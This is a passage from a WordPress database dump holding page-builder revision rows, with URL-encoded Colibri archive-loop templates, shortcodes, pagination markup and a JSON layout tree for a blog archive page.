data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]</div>\n </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',34,'https://gsudice.dataconn.net/?p=80',0,'revision','',0),(81,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','inherit','closed','closed','','41-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',41,'https://gsudice.dataconn.net/?p=81',0,'revision','',0),(82,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]\n <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n 